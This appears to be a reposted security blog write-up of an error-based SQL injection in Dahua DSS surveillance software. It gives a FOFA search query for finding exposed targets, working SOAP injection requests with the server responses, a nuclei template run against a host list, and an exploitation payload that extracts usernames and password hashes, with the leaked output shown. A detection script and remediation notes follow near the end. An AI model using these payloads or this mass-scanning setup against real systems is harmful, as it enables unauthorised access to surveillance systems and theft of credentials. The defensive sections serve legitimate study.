Dahua DSS SQL injection vulnerability (with exploit)

admin, 2023-12-20 14:05:26


Bonus: the editor has collected a large set of e-books and commonly used defensive-exercise tools; see the end of the article for free access.


01 Vulnerability name



Dahua DSS itcBulletin SQL injection vulnerability


02 Affected product


大华 DSS




03 Description


The itcBulletin interface of the Dahua DSS digital surveillance system contains a SQL injection vulnerability. An attacker can exploit it to read sensitive information from the database.


04 FOFA query

app="dahua-DSS"



05 Reproduction


Send the following request to the test environment; the injected expression makes the database compute md5(102103122).

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

The response is as follows:

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 581
Content-Type: text/xml;charset=ISO-8859-1
Date: Tue, 19 Dec 2023 10:13:48 GMT
Server: Apache-Coyote/1.1

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>PreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 ) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'; nested exception is java.sql.SQLException: XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'</faultstring></soap:Fault></soap:Body></soap:Envelope>

The response body contains 6cfe798ba8e5b85feb50164c59f4bec (the MD5 value, echoed back inside the XPath error message).

Reproduction successful.



06 nuclei PoC


The PoC file content is as follows:

id: dahua-dss-itcBulletin-sqli
info:
  name: 大华DSS itcBulletin SQL注入漏洞
  author: fgz
  severity: high
  description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
  metadata:
    fofa-query: app="dahua-DSS"

requests:
  - raw:
      - |+
        POST /portal/services/itcBulletin?wsdl HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

        <s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
          <s11:Body>
            <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
              <netMarkings>
                (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
              </netMarkings>
            </ns1:deleteBulletin>
          </s11:Body>
        </s11:Envelope>

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'

Run the PoC:

.\nuclei.exe -t dahua-dss-itcBulletin-sqli.yaml -l dahua-dss.txt



07 Exploitation


To retrieve the system's usernames and passwords through the vulnerability, replace the md5() call in the PoC with a SQL subquery:

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

The response is as follows:

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 643
Content-Type: text/xml;charset=ISO-8859-1
Date: Tue, 19 Dec 2023 11:46:52 GMT
Server: Apache-Coyote/1.1

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>PreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'; nested exception is java.sql.SQLException: XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'</faultstring></soap:Fault></soap:Body></soap:Envelope>


Here system is the username and 8e173a7bb9ec8156d772cf4 is the MD5 of its password.
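From the defender's side, the two signals in the exchange above are a netMarkings value that is not a plain ID list but carries updatexml()/concat(0x7e,...) and a parenthesis break-out, and a 500 SOAP fault that echoes the database's XPath error (the same condition the nuclei matcher keys on). The following is an added example, not code from the write-up or from Dahua, of a request/response inspector a WAF rule or log review could implement; the sample bodies are constructed to mirror the packets above, and the rule that legitimate netMarkings are comma-separated numeric IDs is an assumption.

```python
import re
import xml.etree.ElementTree as ET
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SVC_NS = "http://itcbulletinservice.webservice.dssc.dahua.com"
# Constructed sample bodies with the same shape as the request and fault shown above.
SAMPLE_REQUEST = (
    f"<s11:Envelope xmlns:s11='{SOAP_NS}'><s11:Body>"
    f"<ns1:deleteBulletin xmlns:ns1='{SVC_NS}'><netMarkings>"
    " (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 "
    "</netMarkings></ns1:deleteBulletin></s11:Body></s11:Envelope>"
)
SAMPLE_FAULT = (
    f"<soap:Envelope xmlns:soap='{SOAP_NS}'><soap:Body><soap:Fault><faultcode>soap:Server"
    "</faultcode><faultstring>PreparedStatementCallback; uncategorized SQLException for SQL "
    "[select t.* from C_BULLETIN t where ...]; SQL state [HY000]; error code [1105]; XPATH "
    "syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'</faultstring></soap:Fault></soap:Body></soap:Envelope>"
)

# Signatures of the MySQL error-based technique used against this endpoint.
INJECTION_PATTERNS = [
    re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),  # error-based XPath functions
    re.compile(r"\bconcat\s*\(\s*0x7e", re.I),             # '~' delimiters around the leaked value
    re.compile(r"\)\s*(and|or)\s*\(", re.I),               # breaking out of the IN ( ... ) list
]

def extract_net_markings(body):
    """Return the text of <netMarkings> inside ns1:deleteBulletin, or None if absent."""
    node = ET.fromstring(body).find(f".//{{{SVC_NS}}}deleteBulletin/netMarkings")
    return None if node is None else (node.text or "").strip()

def inspect_request(body):
    """List the reasons a deleteBulletin request looks like SQL injection (empty = clean)."""
    value = extract_net_markings(body)
    if value is None:
        return []
    reasons = []
    # Assumption (not in the write-up): legitimate netMarkings are comma-separated numeric IDs.
    if not re.fullmatch(r"\d+(\s*,\s*\d+)*", value):
        reasons.append("netMarkings is not a numeric ID list")
    reasons += [f"matches /{p.pattern}/" for p in INJECTION_PATTERNS if p.search(value)]
    return reasons

def fault_leaks_sql_error(status, body):
    """True when a 500 SOAP fault echoes the database error text, the signal the PoC matches on."""
    if status != 500:
        return False
    node = ET.fromstring(body).find(f".//{{{SOAP_NS}}}Fault/faultstring")
    text = node.text if node is not None else ""
    return "error code [1105]" in text or "XPATH syntax error" in text
```

A positive fault_leaks_sql_error() on a request that inspect_request() already flagged is a strong indicator that extraction succeeded, not just that it was attempted, and is worth escalating rather than merely blocking.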


08 Remediation


Upgrade to the latest version or deploy a WAF for protection. Note that the fault string above echoes the full SQL statement and the database error to the client, which is what makes error-based extraction possible; beyond patching, error responses should not expose database details.



09 Bonus downloads


Follow the public account and send the keyword from the account's message page to receive the materials for free.

Send 【工具】 to receive the penetration-testing toolkit.



Send 【电子书】 to receive the e-book bundle.




Originally published on the WeChat public account AI与网安: Dahua DSS SQL injection vulnerability (with exploit)

Reposted by CN-SEC: http://cn-sec.com/archives/2319642.html